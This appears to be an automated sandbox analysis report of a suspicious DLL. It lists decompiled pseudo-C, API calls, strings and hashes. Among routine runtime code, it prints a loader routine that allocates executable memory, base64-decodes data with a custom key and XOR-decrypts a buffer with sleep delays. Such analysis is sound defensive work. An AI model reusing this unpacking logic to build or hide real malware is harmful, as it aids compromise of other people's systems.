              																			_t346 = _t75 & 0xffffffe0;
              																			 *(_t346 - 4) = _t267;
              																			L53:
              																			_t295[4] = _v20;
              																			_t295[5] = _t364;
              																			_t383 = _t346 + _t338;
              																			_v20 = _t383;
              																			__eflags = _v4 - 0x10;
              																			_v16 = _a8 + _t383;
              																			_push(_t338);
              																			if(_v4 < 0x10) {
              																				_push(_t295);
              																				_push(_t346);
              																				E6DA8AB10();
              																				E6DA8AB10(_t383, _a4, _a8);
              																				 *_v16 = 0;
              																				 *_t295 = _t346;
              																				return _t295;
              																			} else {
              																				_t385 =  *_t295;
              																				_push(_t385);
              																				_push(_t346);
              																				E6DA8AB10();
              																				E6DA8AB10(_v20, _a4, _a8);
              																				_t408 = _t408 + 0x18;
              																				_t329 = _v4 + 1;
              																				 *_v16 = 0;
              																				__eflags = _t329 - 0x1000;
              																				if(_t329 < 0x1000) {
              																					L57:
              																					_push(_t329);
              																					E6DA893C9(_t385);
              																					 *_t295 = _t346;
              																					return _t295;
              																				} else {
              																					_t338 =  *(_t385 - 4);
              																					_t315 = _t329 + 0x23;
              																					_t364 = _t385 - _t338;
              																					_t94 = _t364 - 4; // 0x7ffffffb
              																					__eflags = _t94 - 0x1f;
              																					if(_t94 > 0x1f) {
              																						goto L61;
              																					} else {
              																						_t385 = _t338;
              																						goto L57;
              																					}
              																				}
              																			}
              																		}
              																	}
              																}
              															} else {
              																_t362 = _v24;
              																_v0 = _t362;
              																_v12 = 1;
              																E6DA88A87(__eflags, _t362);
              																 *((intOrPtr*)( *_t362 + 4))();
              																 *0x6dad5c78 = _t362;
              																goto L37;
              															}
              														} else {
              															_t362 = _t293;
              															goto L37;
              														}
              													} else {
              														_t362 =  *( *((intOrPtr*)(_t270 + 8)) + _t346 * 4);
              														goto L32;
              													}
              												}
              											}
              										}
              									} else {
              										E6DA88BB9( &_v76,  &_v76, _t345);
              										 *((intOrPtr*)(_t360 + 4)) = 0;
              										 *_t360 = 0x6daa4e00;
              										E6DA829E0( &_v76);
              										_a4 = _t360;
              										_v8 = 9;
              										E6DA88A87(__eflags, _t360);
              										 *((intOrPtr*)( *_t360 + 4))();
              										 *0x6dad5c7c = _t360;
              										goto L6;
              									}
              								} else {
              									_t360 = _t291;
              									goto L6;
              								}
              							} else {
              								_t360 =  *( *((intOrPtr*)(_t283 + 8)) + _t343 * 4);
              								goto L11;
              							}
              						}
              					} else {
              						L6:
              						E6DA8892E( &_v24);
              						 *[fs:0x0] = _v16;
              						return _t360;
              					}
              				}
              			}
              0x6da8607e
              0x6da8608d
              0x6da8608f
              0x6da8609e
              0x6da8609e
              0x6da86091
              0x6da86092
              0x6da86097
              0x6da8609a
              0x6da8609a
              0x00000000
              0x6da86080
              0x6da86080
              0x6da86080
              0x6da86083
              0x6da86085
              0x6da8616a
              0x6da8616a
              0x00000000
              0x6da8608b
              0x00000000
              0x6da8608b
              0x6da86085
              0x6da86067
              0x6da86067
              0x00000000
              0x6da86067
              0x6da8603a
              0x6da8603a
              0x6da8603c
              0x6da8603c
              0x6da86041
              0x6da86042
              0x6da86047
              0x6da8604a
              0x6da8604c
              0x6da8616f
              0x6da8616f
              0x6da86174
              0x6da86175
              0x6da86176
              0x6da86177
              0x6da86178
              0x6da86179
              0x6da8617a
              0x6da8617b
              0x6da8617c
              0x6da8617d
              0x6da8617e
              0x6da8617f
              0x6da86180
              0x6da86183
              0x6da86186
              0x6da86187
              0x6da86189
              0x6da86190
              0x6da86191
              0x6da86194
              0x6da86199
              0x6da8619c
              0x6da8619d
              0x6da8619f
              0x6da862c9
              0x00000000
              0x6da861a5
              0x6da861a5
              0x6da861a8
              0x6da861ad
              0x6da861b0
              0x6da861b3
              0x6da861b6
              0x6da861b8
              0x6da861e2
              0x6da861e4
              0x6da861e6
              0x6da861e8
              0x6da861f1
              0x6da861f3
              0x6da861f5
              0x6da861f8
              0x6da861f8
              0x6da861fb
              0x6da86201
              0x6da86210
              0x6da86212
              0x6da86224
              0x6da86224
              0x6da86214
              0x6da86215
              0x6da8621a
              0x6da8621d
              0x6da86220
              0x6da86220
              0x00000000
              0x6da86203
              0x6da86203
              0x6da86203
              0x6da86206
              0x6da86208
              0x6da862ce
              0x6da862ce
              0x00000000
              0x6da8620e
              0x00000000
              0x6da8620e
              0x6da86208
              0x6da861ea
              0x6da861ea
              0x00000000
              0x6da861ea
              0x6da861ba
              0x6da861ba
              0x6da861bc
              0x6da861bc
              0x6da861c1
              0x6da861c2
              0x6da861c7
              0x6da861ca
              0x6da861cc
              0x6da862d3
              0x6da862d3
              0x6da862d8
              0x6da862d9
              0x6da862da
              0x6da862db
              0x6da862dc
              0x6da862dd
              0x6da862de
              0x6da862df
              0x6da862e0
              0x6da862e2
              0x6da862e4
              0x00000000
              0x6da862ea
              0x6da862ec
              0x6da861d2
              0x6da861d2
              0x6da861d5
              0x6da861d8
              0x6da861db
              0x6da86226
              0x6da86229
              0x6da86236
              0x6da86239
              0x6da8623e
              0x6da86241
              0x6da86245
              0x6da86248
              0x6da86249
              0x6da862a0
              0x6da862a1
              0x6da862a2
              0x6da862ae
              0x6da862b9
              0x6da862be
              0x6da862c6
              0x6da8624b
              0x6da8624b
              0x6da8624d
              0x6da8624e
              0x6da8624f
              0x6da8625d
              0x6da8626b
              0x6da8626c
              0x6da8626f
              0x6da86275
              0x6da86289
              0x6da86289
              0x6da8628b
              0x6da86293
              0x6da8629d
              0x6da86277
              0x6da86277
              0x6da8627a
              0x6da8627f
              0x6da86282
              0x6da86285
              0x00000000
              0x6da86287
              0x6da86287
              0x00000000
              0x6da86287
              0x6da86285
              0x6da86275
              0x6da86249
              0x6da861cc
              0x6da861b8
              0x6da86052
              0x6da86052
              0x6da86055
              0x6da86058
              0x6da860a0
              0x6da860a6
              0x6da860b0
              0x6da860b6
              0x6da860b9
              0x6da860bf
              0x6da860c4
              0x6da860c7
              0x6da860cb
              0x6da860ce
              0x6da860cf
              0x6da86131
              0x6da86132
              0x6da86133
              0x6da8613f
              0x6da8614a
              0x6da86150
              0x6da86158
              0x6da86162
              0x6da860d1
              0x6da860d1
              0x6da860d3
              0x6da860d4
              0x6da860d5
              0x6da860e3
              0x6da860f4
              0x6da860fc
              0x6da860ff
              0x6da86100
              0x6da86106
              0x6da8611a
              0x6da8611a
              0x6da8611c
              0x6da86124
              0x6da8612e
              0x6da86108
              0x6da86108
              0x6da8610b
              0x6da8610e
              0x6da86110
              0x6da86113
              0x6da86116
              0x00000000
              0x6da86118
              0x6da86118
              0x00000000
              0x6da86118
              0x6da86116
              0x6da86106
              0x6da860cf
              0x6da8604c
              0x6da86038
              0x6da85ef2
              0x6da85ef2
              0x6da85ef5
              0x6da85ef8
              0x6da85efb
              0x6da85f46
              0x6da85f49
              0x6da85f4f
              0x6da85f52
              0x6da85f57
              0x6da85f5a
              0x6da85f5e
              0x6da85f61
              0x6da85f62
              0x6da85fb9
              0x6da85fba
              0x6da85fbb
              0x6da85fc7
              0x6da85fd2
              0x6da85fd7
              0x6da85fdf
              0x6da85f64
              0x6da85f64
              0x6da85f66
              0x6da85f67
              0x6da85f68
              0x6da85f76
              0x6da85f7e
              0x6da85f84
              0x6da85f85
              0x6da85f88
              0x6da85f8e
              0x6da85fa2
              0x6da85fa2
              0x6da85fa4
              0x6da85fac
              0x6da85fb6
              0x6da85f90
              0x6da85f90
              0x6da85f93
              0x6da85f96
              0x6da85f98
              0x6da85f9b
              0x6da85f9e
              0x00000000
              0x6da85fa0
              0x6da85fa0
              0x00000000
              0x6da85fa0
              0x6da85f9e
              0x6da85f8e
              0x6da85f62
              0x6da85eec
              0x6da85ed8
              0x6da85e50
              0x6da85e50
              0x6da85e53
              0x6da85e57
              0x6da85e5b
              0x6da85e67
              0x6da85e6a
              0x00000000
              0x6da85e6a
              0x6da85e38
              0x6da85e38
              0x00000000
              0x6da85e38
              0x6da85e2a
              0x6da85e2d
              0x00000000
              0x6da85e2d
              0x6da85e28
              0x6da85e1e
              0x6da85e14
              0x6da85d34
              0x6da85d39
              0x6da85d41
              0x6da85d4b
              0x6da85d51
              0x6da85d56
              0x6da85d5a
              0x6da85d5e
              0x6da85d6a
              0x6da85d6d
              0x00000000
              0x6da85d6d
              0x6da85cbe
              0x6da85cbe
              0x00000000
              0x6da85cbe
              0x6da85cb0
              0x6da85cb3
              0x00000000
              0x6da85cb3
              0x6da85cae
              0x6da85c83
              0x6da85c83
              0x6da85c86
              0x6da85c93
              0x6da85c9d
              0x6da85c9d
              0x6da85c81

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85C23
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85C43
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85C63
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85C86
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85CF1
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA85D39
              • std::_Facet_Register.LIBCPMT ref: 6DA85D5E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegister
              • String ID: bad locale name
              • API String ID: 1197013505-1405518554
              • Opcode ID: b425e46fa188b9f1fa15b2e1b18f0459bf986a69f6181527e3ac4d04fb08e7b1
              • Instruction ID: 0a09d4d44301b6a7734d5f62fd2412c6530b18a0cecd6c55e2d771adc36eee1c
              • Opcode Fuzzy Hash: b425e46fa188b9f1fa15b2e1b18f0459bf986a69f6181527e3ac4d04fb08e7b1
              • Instruction Fuzzy Hash: 7441B0B590C2449FCB11CFA8DA84BAEBBB4FF45714F19805DDC49AB342DB30A985CB91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6DA891F8
              • __alloca_probe_16.LIBCMT ref: 6DA89224
              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6DA89263
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DA89280
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6DA892BF
              • __alloca_probe_16.LIBCMT ref: 6DA892DC
              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DA8931E
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DA89341
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ByteCharMultiStringWide$__alloca_probe_16
              • String ID:
              • API String ID: 2040435927-0
              • Opcode ID: 57a911794fc0f8ffcb1106b0d183901654578ef6bcf9d983d65d9be1fa886461
              • Instruction ID: 4c204d8688979188a206cc6f70db2bb06dfa5c700b935b47343f3ec823e313b9
              • Opcode Fuzzy Hash: 57a911794fc0f8ffcb1106b0d183901654578ef6bcf9d983d65d9be1fa886461
              • Instruction Fuzzy Hash: 1451F272508216AFEF108FA0CE44FAF7BB9EF49740F194528FD2496191EB78D880CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E6DA81B10() {
              				intOrPtr _v0;
              				intOrPtr _v4;
              				intOrPtr _v8;
              				void* _v16;
              				intOrPtr _v24;
              				intOrPtr _v29;
              				unsigned int _v30;
              				signed char _v32;
              				signed char _v33;
              				signed int _v38;
              				signed int _v39;
              				signed int _v40;
              				signed int _v44;
              				void* _v48;
              				void* _v52;
              				void* _v56;
              				signed int* _v60;
              				signed int _v64;
              				intOrPtr _v68;
              				intOrPtr _v72;
              				void* _v76;
              				void* _v92;
              				char _v100;
              				char _v164;
              				void* __ebx;
              				void* __edi;
              				char _t99;
              				intOrPtr _t100;
              				intOrPtr _t103;
              				signed char _t107;
              				signed char _t108;
              				void* _t116;
              				void* _t119;
              				intOrPtr _t131;
              				intOrPtr _t136;
              				void* _t146;
              				signed int* _t151;
              				void* _t153;
              				signed char _t157;
              				void* _t159;
              				void* _t174;
              				signed int _t176;
              				void* _t181;
              				intOrPtr _t200;
              				unsigned char _t206;
              				void* _t208;
              				void* _t210;
              				void* _t212;
              				signed int _t213;
              				void* _t216;
              				void* _t218;
              				intOrPtr* _t219;
              				signed int _t220;
              				void* _t222;
              				intOrPtr _t225;
              				void* _t229;
              				intOrPtr _t232;
              				void* _t233;
              
              				_t159 = _t229;
              				_t232 = (_t229 - 0x00000008 & 0xfffffff8) + 4;
              				_v8 =  *((intOrPtr*)(_t159 + 4));
              				_t225 = _t232;
              				_push(0xffffffff);
              				_push(E6DAA2345);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t232;
              				_push(_t159);
              				_t233 = _t232 - 0x88;
              				asm("movups xmm0, [0x6daaf258]");
              				_t99 =  *0x6daaf298; // 0x0
              				asm("movups [ebp-0x98], xmm0");
              				asm("movups xmm0, [0x6daaf268]");
              				_v100 = _t99;
              				_t100 =  *0x6dad4884; // 0x20e6c
              				asm("movups [ebp-0x88], xmm0");
              				asm("movups xmm0, [0x6daaf278]");
              				asm("movups [ebp-0x78], xmm0");
              				asm("movups xmm0, [0x6daaf288]");
              				asm("movups [ebp-0x68], xmm0");
              				_t195 = VirtualAlloc(0, _t100 + _t100, 0x3000, 0x40);
              				_t210 = 0;
              				_t103 =  *0x6dad4884; // 0x20e6c
              				_t216 = 0;
              				_v64 = _t195;
              				_v44 = 0;
              				if(_t103 == 0) {
              					L27:
              					 *0x6dad4884 = _t210;
              					 *[fs:0x0] = _v24;
              					return _v64;
              				} else {
              					_t6 = _t195 + 2; // 0x2
              					_t164 = _t6;
              					_v60 = _t6;
              					while(1) {
              						_v68 = _t103 - 1;
              						_t107 =  *( *(_t159 + 8));
              						_v33 = _t107;
              						if(_t107 == 0x3d) {
              							break;
              						}
              						_t119 = E6DA8DB50(_t159, _t164, _t195, _t107 & 0x000000ff);
              						_t233 = _t233 + 4;
              						if(_t119 != 0) {
              							L6:
              							_v56 = 0;
              							_v52 = 0;
              							_v48 = 0;
              							_v16 = 0;
              							_push(0xd);
              							_v92 = 0;
              							_v76 = 0;
              							_v72 = 0xf;
              							_v92 = 0;
              							E6DA81770( &_v92, "dfxsgdfhdgfjh");
              							_v16 = 1;
              							_t174 =  &_v56;
              							E6DA82160(_t159, _t174, _t210, 0,  &_v92);
              							_v16 = 0;
              							_t200 = _v72;
              							if(_t200 < 0x10) {
              								L10:
              								_t210 = _v56;
              								_t195 = _v52;
              								_push(_t174);
              								E6DA82340(_t210, _v52, _t210);
              								_t176 =  *(_t159 + 8);
              								_t233 = _t233 + 4;
              								_v52 = _t210;
              								_t164 = _t176 + 1;
              								 *((char*)(_t225 + _t216 - 0x14)) =  *_t176;
              								_t216 = _t216 + 1;
              								 *(_t159 + 8) = _t164;
              								if(_t216 == 4) {
              									_t222 = 0;
              									do {
              										_t146 = E6DA8A950( &_v164,  *((char*)(_t225 + _t222 - 0x14)));
              										_t233 = _t233 + 8;
              										 *((char*)(_t225 + _t222 - 0x14)) = _t146 -  &_v164;
              										_t222 = _t222 + 1;
              									} while (_t222 < 4);
              									_t206 = _v30;
              									_v44 = _v44 + 3;
              									_t195 = (_t206 << 6) + _v29;
              									_t164 = (_t206 >> 0x00000002 & 0x0000000f) + (_v32 << 4);
              									_t151 = _v60;
              									_v40 = _t164;
              									_v39 = _t164;
              									_v38 = _t195;
              									 *(_t151 - 2) = _t164;
              									 *(_t151 - 1) = _t164;
              									 *_t151 = _t195;
              									_v60 =  &(_t151[0]);
              									_t216 = 0;
              								}
              								_v16 = 0xffffffff;
              								if(_t210 == 0) {
              									L18:
              									_t103 = _v68;
              									if(_t103 != 0) {
              										continue;
              									} else {
              										break;
              									}
              								} else {
              									_push(_t164);
              									E6DA82340(_t210, _t210, _t210);
              									_t233 = _t233 + 4;
              									_t195 = 0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2;
              									_t131 = _t210;
              									_t164 = (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2) + ((0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _t210) >> 0x20 >> 2)) * 2 << 3;
              									if(_t164 < 0x1000) {
              										L17:
              										_push(_t164);
              										E6DA893C9(_t210);
              										_t233 = _t233 + 8;
              										_v56 = 0;
              										_v52 = 0;
              										_v48 = 0;
              										goto L18;
              									} else {
              										_t210 =  *((intOrPtr*)(_t210 - 4));
              										_t164 = _t164 + 0x23;
              										if(_t131 - _t210 + 0xfffffffc > 0x1f) {
              											goto L28;
              										} else {
              											goto L17;
              										}
              									}
              								}
              							} else {
              								_t174 = _v92;
              								_t208 = _t200 + 1;
              								_t153 = _t174;
              								if(_t208 < 0x1000) {
              									L9:
              									_push(_t208);
              									E6DA893C9(_t174);
              									_t233 = _t233 + 8;
              									goto L10;
              								} else {
              									_t164 =  *(_t174 - 4);
              									_t195 = _t208 + 0x23;
              									if(_t153 -  *(_t174 - 4) + 0xfffffffc > 0x1f) {
              										L28:
              										E6DA8DACF(_t159, _t164, _t195);
              										asm("int3");
              										asm("int3");
              										_push(_t225);
              										_push(_t216);
              										_t219 = _v164;
              										_push(_t210);
              										_t181 = _t219 + 1;
              										do {
              											_t136 =  *_t219;
              											_t219 = _t219 + 1;
              										} while (_t136 != 0);
              										_t213 = 0;
              										_t220 = _t219 - _t181;
              										if(_v4 > 0) {
              											_push(_t159);
              											do {
              												if(_t213 == (0x10624dd3 * _t213 >> 0x20 >> 6) * 0x3e8) {
              													Sleep(2);
              												}
              												asm("cdq");
              												 *(_t213 + 0x6dab3a18) =  *(_t213 + 0x6dab3a18) ^  *(_t213 % _t220 + _v0);
              												_t213 = _t213 + 1;
              											} while (_t213 < _v4);
              										}
              										return 0x6dab3a18;
              									} else {
              										goto L9;
              									}
              								}
              							}
              						} else {
              							_t157 = _v33;
              							if(_t157 == 0x2b || _t157 == 0x2f) {
              								goto L6;
              							} else {
              								DebugBreak();
              								break;
              							}
              						}
              						goto L38;
              					}
              					if(_t216 == 0) {
              						_t210 = _v44;
              					} else {
              						_t212 = 0;
              						if(_t216 > 0) {
              							do {
              								_t116 = E6DA8A950( &_v164,  *((char*)(_t225 + _t212 - 0x14)));
              								_t233 = _t233 + 8;
              								 *((char*)(_t225 + _t212 - 0x14)) = _t116 -  &_v164;
              								_t212 = _t212 + 1;
              							} while (_t212 < _t216);
              						}
              						_t108 = _v32;
              						_t218 = _t216 - 1;
              						_t210 = _v44;
              						_v40 = (_t108 >> 0x00000004 & 0x00000003) + (_t108 << 2);
              						_v39 = (_v30 >> 0x00000002 & 0x0000000f) + (_t108 << 4);
              						if(_t218 > 0) {
              							E6DA8AB10(_v64 + _t210,  &_v40, _t218);
              							_t210 = _t210 + _t218;
              						}
              					}
              					goto L27;
              				}
              				L38:
              			}

              APIs
              • VirtualAlloc.KERNEL32(00000000,00020E6C,00003000,00000040,00000000), ref: 6DA81B8F
              • ___from_strstr_to_strchr.LIBCMT ref: 6DA81CAD
              • ___from_strstr_to_strchr.LIBCMT ref: 6DA81DAD
              • DebugBreak.KERNEL32 ref: 6DA81E0D
              Strings
              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 6DA81B42
              • dfxsgdfhdgfjh, xrefs: 6DA81C0F
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ___from_strstr_to_strchr$AllocBreakDebugVirtual
              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$dfxsgdfhdgfjh
              • API String ID: 948567615-1324637814
              • Opcode ID: 85b44af411087bf5daa2d2c4e2f7d210ced8035e0b8107566c978d954f312e84
              • Instruction ID: 327c84dccb64e9ed4e0d982ace9540ff128371d8e263acee27fbc1542068738a
              • Opcode Fuzzy Hash: 85b44af411087bf5daa2d2c4e2f7d210ced8035e0b8107566c978d954f312e84
              • Instruction Fuzzy Hash: A7A14B72D0C2488BDB05CFA8C9907FEBBB4AF5A304F194258DD5467383D7745589CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA96512(void* __ecx, signed int* _a4, intOrPtr _a8) {
              				signed int _v8;
              				void* _t20;
              				void* _t22;
              				WCHAR* _t26;
              				signed int _t29;
              				void** _t30;
              				signed int* _t35;
              				void* _t38;
              				void* _t40;
              
              				_t35 = _a4;
              				while(_t35 != _a8) {
              					_t29 =  *_t35;
              					_v8 = _t29;
              					_t38 =  *(0x6dad5a60 + _t29 * 4);
              					if(_t38 == 0) {
              						_t26 =  *(0x6daa7930 + _t29 * 4);
              						_t38 = LoadLibraryExW(_t26, 0, 0x800);
              						if(_t38 != 0) {
              							L14:
              							_t30 = 0x6dad5a60 + _v8 * 4;
              							 *_t30 = _t38;
              							if( *_t30 != 0) {
              								FreeLibrary(_t38);
              							}
              							L16:
              							_t20 = _t38;
              							L13:
              							return _t20;
              						}
              						_t22 = GetLastError();
              						if(_t22 != 0x57) {
              							L9:
              							 *(0x6dad5a60 + _v8 * 4) = _t22 | 0xffffffff;
              							L10:
              							_t35 =  &(_t35[1]);
              							continue;
              						}
              						_t22 = E6DA92838(_t26, L"api-ms-", 7);
              						_t40 = _t40 + 0xc;
              						if(_t22 == 0) {
              							goto L9;
              						}
              						_t22 = E6DA92838(_t26, L"ext-ms-", 7);
              						_t40 = _t40 + 0xc;
              						if(_t22 == 0) {
              							goto L9;
              						}
              						_t22 = LoadLibraryExW(_t26, _t38, _t38);
              						_t38 = _t22;
              						if(_t38 != 0) {
              							goto L14;
              						}
              						goto L9;
              					}
              					if(_t38 != 0xffffffff) {
              						goto L16;
              					}
              					goto L10;
              				}
              				_t20 = 0;
              				goto L13;
              			}


              APIs
              • FreeLibrary.KERNEL32(00000000,?,6DA9661F,6DA824BD,?,?,00000000,?,?,6DA967EC,00000021,FlsSetValue,6DAA7F50,6DAA7F58,?), ref: 6DA965D3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: e761a4706c07cb0e9c012162dadb34cc00d3cfd4ec605bdac0352c3cd927baec
              • Instruction ID: 2146d1dec2a62f2198034fb9e7a42417b303566242833e41a36f254e7a7811e0
              • Opcode Fuzzy Hash: e761a4706c07cb0e9c012162dadb34cc00d3cfd4ec605bdac0352c3cd927baec
              • Instruction Fuzzy Hash: E1210875A2C726ABCB119A24CC44B6A37F9EF47370F1D4210E919AB384DB70EA81C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E6DA85D90(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
              				signed int _v0;
              				signed int _v4;
              				unsigned int _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				char _v28;
              				signed int _v32;
              				signed int _v44;
              				signed int _v48;
              				signed int _v60;
              				intOrPtr _v68;
              				signed int _v80;
              				void* _t132;
              				void* _t148;
              				signed int _t151;
              				unsigned int _t153;
              				void* _t154;
              				signed int _t169;
              				signed int* _t171;
              				signed int _t172;
              				unsigned int _t174;
              				void* _t175;
              				signed int _t178;
              				signed int _t193;
              				signed int* _t195;
              				signed int _t196;
              				unsigned int _t198;
              				void* _t199;
              				signed int _t213;
              				signed int* _t215;
              				void* _t218;
              				signed int _t223;
              				signed int _t224;
              				signed int _t226;
              				signed int* _t228;
              				signed int* _t229;
              				signed int* _t230;
              				signed int* _t239;
              				signed int* _t245;
              				void* _t247;
              				void* _t254;
              				void* _t256;
              				signed int _t261;
              				signed int _t262;
              				signed int _t263;
              				signed int _t266;
              				unsigned int _t268;
              				signed int _t269;
              				signed int _t280;
              				signed int _t282;
              				signed int _t283;
              				intOrPtr _t284;
              				signed int _t286;
              				unsigned int _t287;
              				signed int _t288;
              				signed int _t290;
              				signed int _t294;
              				signed int _t295;
              				signed int _t297;
              				signed int _t300;
              				signed int _t301;
              				signed int _t303;
              				intOrPtr _t306;
              				void* _t308;
              				void* _t309;
              				intOrPtr _t317;
              				void* _t318;
              				void* _t320;
              				void* _t321;
              				void* _t322;
              				void* _t323;
              				void* _t339;
              
              				_t306 = _t317;
              				_push(0xffffffff);
              				_push(E6DAA2685);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t317;
              				_t318 = _t317 - 0xc;
              				_push(__ebx);
              				_push(__esi);
              				_push(__edi);
              				E6DA888D6( &_v28, 0);
              				_v8 = 0;
              				_t266 =  *0x6dad5cb8; // 0x0
              				_t226 =  *0x6dad5c78; // 0x0
              				_v20 = _t226;
              				if(_t266 == 0) {
              					E6DA888D6( &_v24, _t266);
              					_t339 =  *0x6dad5cb8 - _t266; // 0x0
              					if(_t339 == 0) {
              						_t223 =  *0x6dad5048; // 0x0
              						_t224 = _t223 + 1;
              						 *0x6dad5048 = _t224;
              						 *0x6dad5cb8 = _t224;
              					}
              					E6DA8892E( &_v24);
              					_t266 =  *0x6dad5cb8; // 0x0
              				}
              				_t239 =  *(_a4 + 4);
              				if(_t266 >= _t239[3]) {
              					_t280 = 0;
              					__eflags = 0;
              					goto L8;
              				} else {
              					_t280 =  *(_t239[2] + _t266 * 4);
              					if(_t280 != 0) {
              						L16:
              						E6DA8892E( &_v28);
              						 *[fs:0x0] = _v16;
              						return _t280;
              					} else {
              						L8:
              						if(_t239[5] == 0) {
              							L11:
              							if(_t280 != 0) {
              								goto L16;
              							} else {
              								goto L12;
              							}
              						} else {
              							_t218 = E6DA88AB3();
              							if(_t266 >=  *((intOrPtr*)(_t218 + 0xc))) {
              								L12:
              								if(_t226 == 0) {
              									_t132 = E6DA862F0(_t226, _t266,  &_v20, _a4);
              									_t320 = _t318 + 8;
              									__eflags = _t132 - 0xffffffff;
              									if(__eflags == 0) {
              										E6DA82950();
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										asm("int3");
              										_push(_t306);
              										_t308 = _t320;
              										_t321 = _t320 - 8;
              										_push(_t226);
              										_t228 = _t239;
              										_t242 = 0x7fffffff;
              										_push(_t280);
